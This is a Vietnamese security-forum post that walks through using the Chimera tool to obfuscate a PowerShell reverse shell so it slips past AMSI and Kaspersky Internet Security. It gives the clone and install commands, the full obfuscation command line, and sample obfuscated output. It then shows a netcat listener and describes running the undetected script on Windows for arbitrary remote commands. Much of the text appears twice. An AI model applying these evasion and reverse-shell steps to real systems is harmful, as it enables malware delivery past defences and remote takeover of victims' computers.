DDos
VIP Members
-
22/10/2013
-
524
-
2.189 bài viết
Vượt qua phần mềm diệt virus Kaspersky Internet Security với công cụ Chimera
Chimera là một tập lệnh làm rối mã PowerShell được thiết kế để vượt qua AMSI và các giải pháp chống vi-rút. Nó xử lý các đoạn mã powershell độc hại và sử dụng thay thế chuỗi và nối các biến để tránh sự phát hiện của các công cụ phát hiện dựa trên chữ ký.
Chimera sẽ thực hiện rất nhiều các kỹ thuật làm rối mã khác nhau để đạt được mục đích vượt qua phần mềm diệt virus. Ví dụ hàm transformer sẽ tách các chuỗi thành nhiều đoạn và cấu trúc lại chúng dưới dạng các biến mới. Ví dụ các ký tự đầu vào của hàm này là ... New-Object System.Net.Sockets.TCPClient ..., thì ký tự đầu ra sẽ là:
Ở cấp độ cao hơn, hàm sẽ phân tách các chuỗi và kiểu dữ liệu thành các phần khác nhau. Kết quả hàm sẽ trả về là:
Cách sử dụng Chimera
1. Tải về bằng cách sử dụng lệnh:
2. Hiển thị các tham số của công cụ:
./chimera.sh --help
3. Trong thư mục shells, có tất cả 9 loại shell khác nhau. Bạn có thể chọn bất kỳ tệp .ps1 nào để sử dụng cho mục đích thử nghiệm thâm nhập
Có một điều chắc chắn các tệp này sẽ bị xóa nếu bạn đặt một trong số script này vào máy tính chạy Windows có sử dụng phần mềm diệt virus. Bởi đây đều là các tệp độc hại.
Ví dụ, Kaspersky Internet Security đã xóa tệp generic1.ps1 ngay lập tức khi bạn copy vào hệ thống Windows
4. Bạn cần thay đổi địa chỉ IP của bạn trong tệp generic1.ps1 và cổng bạn mong muốn, để mã hóa tệp lệnh Powershell này, mình dùng lệnh:
chimera sẽ tự động chạy, sử dụng các kỹ thuật khác nhau, và tệp cuối cùng nhận được là chimera.ps1.
5. Khi copy tệp chimera.ps1 vào máy tính Windows, Kaspersky Internet Security không hề phát hiện được.
6. Trên Kali Linux, mình chạy lệnh: nc -lnvp 4444 để chờ kết nối
7. Trên máy Windows, chạy chimera.ps1, lúc này, trên Kali Linux, bạn có thể chạy các lệnh shell tùy ý.
Chimera sẽ thực hiện rất nhiều các kỹ thuật làm rối mã khác nhau để đạt được mục đích vượt qua phần mềm diệt virus. Ví dụ hàm transformer sẽ tách các chuỗi thành nhiều đoạn và cấu trúc lại chúng dưới dạng các biến mới. Ví dụ các ký tự đầu vào của hàm này là ... New-Object System.Net.Sockets.TCPClient ..., thì ký tự đầu ra sẽ là:
Mã:
$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"
... New-Object $a$b$c$d ...
Ở cấp độ cao hơn, hàm sẽ phân tách các chuỗi và kiểu dữ liệu thành các phần khác nhau. Kết quả hàm sẽ trả về là:
Mã:
$CNiJfmZzzQrqZzqKqueOBcUVzmkVbllcEqjrbcaYzTMMd = "`m"
$quiyjqGdhQZgYFRdKpDGGyWNlAjvPCxQTTbmFkvTmyB = "t`Rea"
$JKflrRllAqgRlHQIUzOoyOUEqVuVrqqCKdua = "Get`s"
$GdavWoszHwDVJmpYwqEweQsIAz = "ti`ON"
$xcDWTDlvcJfvDZCasdTnWGvMXkRBKOCGEANJpUXDyjPob = "`L`O`Ca"
$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "`Get`-"
$kvfTogUXUxMfCoxBikPwWgwHrvNOwjoBxxto = "`i"
$tJdNeNXdANBemQKeUjylmlObtYp = "`AsC`i"
$mhtAtRrydLlYBttEnvxuWkAQPTjvtFPwO = "`G"
$PXIuUKzhMNDUYGZKqftvpAiQ = "t`R`iN
1. Tải về bằng cách sử dụng lệnh:
Mã:
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera
sudo chmod +x chimera.sh
2. Hiển thị các tham số của công cụ:
./chimera.sh --help
3. Trong thư mục shells, có tất cả 9 loại shell khác nhau. Bạn có thể chọn bất kỳ tệp .ps1 nào để sử dụng cho mục đích thử nghiệm thâm nhập
Có một điều chắc chắn các tệp này sẽ bị xóa nếu bạn đặt một trong số script này vào máy tính chạy Windows có sử dụng phần mềm diệt virus. Bởi đây đều là các tệp độc hại.
Ví dụ, Kaspersky Internet Security đã xóa tệp generic1.ps1 ngay lập tức khi bạn copy vào hệ thống Windows
4. Bạn cần thay đổi địa chỉ IP của bạn trong tệp generic1.ps1 và cổng bạn mong muốn, để mã hóa tệp lệnh Powershell này, mình dùng lệnh:
Mã:
./chimera.sh -f shells/generic1.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p
chimera sẽ tự động chạy, sử dụng các kỹ thuật khác nhau, và tệp cuối cùng nhận được là chimera.ps1.
5. Khi copy tệp chimera.ps1 vào máy tính Windows, Kaspersky Internet Security không hề phát hiện được.
6. Trên Kali Linux, mình chạy lệnh: nc -lnvp 4444 để chờ kết nối
7. Trên máy Windows, chạy chimera.ps1, lúc này, trên Kali Linux, bạn có thể chạy các lệnh shell tùy ý.
Chỉnh sửa lần cuối bởi người điều hành: